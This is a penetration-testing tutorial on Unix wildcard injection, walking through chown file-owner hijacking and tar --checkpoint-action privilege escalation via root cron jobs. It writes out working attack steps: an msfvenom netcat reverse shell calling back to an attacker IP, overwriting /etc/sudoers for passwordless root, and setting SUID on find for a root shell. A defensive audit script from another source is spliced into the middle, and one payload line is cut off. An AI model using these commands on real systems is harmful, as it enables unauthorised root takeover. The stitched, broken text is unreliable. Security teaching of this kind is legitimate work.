Hello friends!! In this article we will cover "Wildcard Injection", an interesting old-school UNIX hacking technique that is still a successful approach for post-exploitation, even though many security-minded folks haven't heard of it. You may be surprised to learn that everyday UNIX tools like 'tar' or 'chown' can lead to full system compromise.
Table of Contents
Introduction
Wildcard
Wildcard wildness example 1
File hijacking example 2
Post Exploitation via tar (Phase I)
Tar Wildcard Injection (1st method)
Post Exploitation via tar (Phase II)
Tar Wildcard Injection
Tar Wildcard Injection (2nd method)
Tar Wildcard Injection (3rd method)
Let’s Start!!!
WILDCARD
A wildcard is a character or set of characters that can be used as a replacement for some range or class of characters. Wildcards are interpreted (expanded) by the shell before the command itself ever runs.
Some wildcard characters:
*    An asterisk matches any number of characters in a filename, including none.
?    The question mark matches any single character.
[ ]  Brackets enclose a set of characters, any one of which may match a single character at that position.
-    A hyphen used within [ ] denotes a range of characters.
~    A tilde at the beginning of a word expands to the name of your home directory. Append another user's login name to the tilde and it refers to that user's home directory.
1st Example
You are probably aware of the wildcard symbols and their traditional usage, but here we are presenting the "wildness" of wildcards, and for this I would like to draw your attention to the steps below.
cd ~/Desktop
mkdir wild
cd wild
echo "Hello Friends" > file1
echo "This is wildcard Injection" > file2
echo "take help" > --help
As you can observe, we made a new directory "wild" on the desktop and then, with the help of the echo command, created 3 files and wrote 1 line into each of them.
Afterwards, with the help of the cat command, we try to open all 3 files as shown:
cat file1
cat file2
cat --help
The first two files open normally and show the same text we wrote above. But the cat command fails to read the information written inside the --help file. Instead of showing "take help", cat treats --help as one of its own command-line options and prints its usage text. This kind of trick is what we call wildcard wildness.
File owner hijacking via Chown
Similarly, we now try to do something roguish with the help of the chown command. As we know, it is an abbreviation of "change owner" and is used on Unix-like systems to modify the ownership of files and directories; ownership may only be changed by the super-user.
Let's say we have the following users on our system.
Super-user (root): performs admin-level tasks such as running the chown command.
Non-root user 1 (raj): performs ordinary jobs such as creating files.
Non-root user 2 (aarti): performs ordinary jobs such as creating files.
Mischief user (ignite): performs notorious tasks such as the chown file-reference trick that leads to file owner hijacking.
In the following image you can observe that all the PHP files are owned by user raj. When user ignite finds that all the PHP files are owned by raj, he plants two files of his own in the same directory and uses the file-reference trick for file owner hijacking by executing the commands below.
cd
ls -al
echo "" > my.php
echo > --reference=my.php
As you can notice, most files are owned by user raj and the last two files are owned by user ignite. When the super-user later changes the ownership of all files with the PHP extension using a wildcard, all of those files will indirectly come under the ownership of user ignite.
As you can observe, when the root user runs chown to give ownership of all PHP files to user aarti, an error occurs and as a result all the PHP files are seized by user ignite automatically.
chown -R aarti:aarti *.php
ls -al
Conceptual Information:
If you have ever explored chown's optional switches, you will have found the following option.
--reference=RFILE    use RFILE's owner and group rather than specifying OWNER:GROUP values
In our case user ignite executed the following commands:
echo "" > my.php
echo > --reference=my.php
Then the root user used a wildcard character when changing ownership. The thing is that the wildcard in the 'chown' command line expanded to the file named '--reference=my.php' and passed it to chown as a command-line option, so chown copied my.php's owner (ignite) onto every other matched file.
Post Exploitation via tar (Phase I)
Lab Setup
Now we take the wildness of the wildcard character to the ultimate level; in terms of system hacking it is like a dynamic explosion.
Tar is a very common UNIX program for creating and extracting archives, and with its help we are going to take a compressed backup of a directory. For the lab, make a new directory, give it ALL permissions and then create some files.
mkdir html
chmod 777 html
cd html
touch index.html
touch raj
touch file.txt
Now schedule a task with the help of crontab to run the tar archival program every minute, taking a backup of /var/www/html into /var/backups.
nano /etc/crontab
*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*
Let's verify whether the schedule is working by executing the following commands.
cd /var/backups
ls
Tar Wildcard Injection (1st method)
Privilege Escalation
Start your attacking machine, first compromise the target system and then move to the privilege escalation stage. Suppose I have successfully logged into the victim's machine through ssh and have a non-root user terminal. Then open the crontab to check whether any job is scheduled.
cat /etc/crontab
Here we notice that the target has scheduled the tar archival program every minute, and we know that cron jobs run as root. Let's try to exploit it.
In a new terminal, generate a netcat reverse shell payload with msfvenom by entering the following command.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R
Copy the generated payload and start a netcat listener on the attacking machine as shown below.
nc -lvp 8888
Now write the copied payload into shell.sh and run the following commands inside the victim's tty shell.
echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
The above commands make the tar command run the file shell.sh after the first file is archived. Since tar is running as root via crontab, this spawns a netcat shell and sends it to the attack platform on port 8888. If you go back to the terminal window where the listener is running, you will have the victim's reverse connection within 1 minute.
id
whoami
Conceptual Information:
If you have ever explored tar's optional switches, you will have found the following options.
--checkpoint[=NUMBER]         show progress messages every NUMBERth record (default 10)
--checkpoint-action=ACTION    execute ACTION on each checkpoint
The '--checkpoint-action' option specifies the program that will be executed when the checkpoint is reached; in effect, it lets us run an arbitrary command. Because the wildcard expands to the planted filenames, the options '--checkpoint=1' and '--checkpoint-action=exec=sh shell.sh' are handed to the 'tar' program as command-line options.
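As an added, defensive counterpart to the chown and tar tricks above (this is example code, not from the original article or the DefenseCode paper), here is a small POSIX shell helper that flags option-like filenames in a directory and shows the hardened way to write the backup script; it assumes GNU or BSD find and tar, and the directory and file names in make_demo_dir are constructed for the demo.

```shell
# Added example (not from the original article): audit a directory for
# filenames that a wildcard would turn into options, and archive it in a
# way that makes such names harmless. Assumes GNU/BSD find and tar.

# List the entries of DIR whose name begins with '-'. When a command is
# run as 'chown ... *' or 'tar cf x.tar *', each such entry reaches the
# command as an option rather than as a filename.
option_like_names() {
    find "$1" -mindepth 1 -maxdepth 1 -name '-*' -print
}

# Succeed (exit 0) only when a bare '*' in DIR cannot expand to options.
wildcard_safe() {
    [ -z "$(option_like_names "$1")" ]
}

# Hardened form of the article's backup script: cd into SRC and pass './*'
# so every expanded name starts with './' and can never be parsed as an
# option; '--' ends option parsing as a second line of defence.
# DEST should be an absolute path outside SRC.
safe_backup() {
    (cd "$1" && tar -czf "$2" -- ./*)
}

# Constructed scratch directory shaped like the article's /tmp/data, with
# the two option-like names from the text. demo.sh only leaves a marker
# file, so a caller can tell whether tar ever executed it.
make_demo_dir() {
    work=$(mktemp -d)
    mkdir "$work/data"
    for f in f1 f2 f3; do echo "" > "$work/data/$f"; done
    echo "" > "$work/data/--checkpoint=1"
    echo "" > "$work/data/--checkpoint-action=exec=sh demo.sh"
    echo "touch '$work/ran'" > "$work/data/demo.sh"
    printf '%s\n' "$work"
}

# Stand-alone run: report the risky names, then take a safe backup.
run_demo() {
    W=$(make_demo_dir)
    echo "option-like names in $W/data:"
    option_like_names "$W/data"
    safe_backup "$W/data" "$W/backup.tgz" && echo "archived safely"
    [ -e "$W/ran" ] || echo "demo.sh was not executed by tar"
    rm -rf "$W"
}
run_demo
```

Running the audit from cron before the real backup, or simply switching the script to the safe_backup form, removes the wildcard as an option-injection channel without changing what gets archived.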
Post Exploitation via tar (Phase II)
Lab Setup
There are multiple ways to take a compressed backup, and several techniques can likewise be applied for privilege escalation. In this phase we take a compressed backup of a directory with the help of tar. Make a new directory whose backup you wish to take, give it ALL permissions and then create some files.
cd /tmp
mkdir data
cd data
echo "" > f1
echo "" > f2
echo "" > f3
ls
Now, in another directory, write a bash script that takes a backup of /tmp/data with the help of the tar archive program.
mkdir info
cd info
nano script.sh
chmod 777 script.sh
#!/bin/bash
cd /tmp/data
tar cf /backup/backup.tgz *
Now schedule a task with the help of crontab to run the backup script every minute.
nano /etc/crontab
*/1 * * * * root /info/script.sh
After 1 minute you will notice that the backup.tgz file has been generated.
Tar Wildcard Injection
Privilege Escalation
Start your attacking machine, first compromise the target system and then move to the privilege escalation stage. Suppose I have successfully logged into the victim's machine through ssh and have a non-root user terminal. Then open the crontab to check whether any job is scheduled.
cat /etc/crontab
Here we notice that the target has scheduled a bash script every minute, and we know that cron jobs run as root. The minute the attacker reads the program written inside script.sh, he can apply tar wildcard injection.
Again generate the netcat reverse shell payload as done above, and repeat the steps above as shown in the image.
Then get back to the netcat listener; after 1 minute you will notice you have the victim's netcat session.
whoami
cd /root
pwd
Hence the target can be easily exploited whenever it uses the tar archive program with a wildcard, whether by scheduling the command directly or through a bash script.
Tar Wildcard Injection (2nd method)
Privilege Escalation
Basically, with the help of wildcard injection an attacker wants to gain the highest privilege on the system, so he will try to inject some malicious code through tar for root access. There are multiple ways to obtain root access, and you can apply the following techniques for privilege escalation.
Suppose you have the victim's machine as a non-root user. For privilege escalation, either take root access directly or give sudo rights to the non-root user by adding him to the sudoers file. You can take the help of the following commands.
echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
With the help of the above commands we tried to give root permission to user ignite, and after 1 minute had passed we successfully owned the root account.
sudo -l
sudo bash
whoami
Tar Wildcard Injection (3rd method)
Privilege Escalation
There are multiple ways to escalate privileges with the help of tar injection, but we are discussing only a few of them. Suppose you have the victim's machine as a non-root user; for privilege escalation you can try to set the SUID bit on any system binary and, as above, take the help of the following commands for obtaining root access.
echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
ls -al /usr/bin/find
find f1 -exec "whoami" \;
root
find f1 -exec "/bin/sh" \;
id
whoami
WOOhOOO!! I hope you enjoy this trick during your penetration tests.
Source:
https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt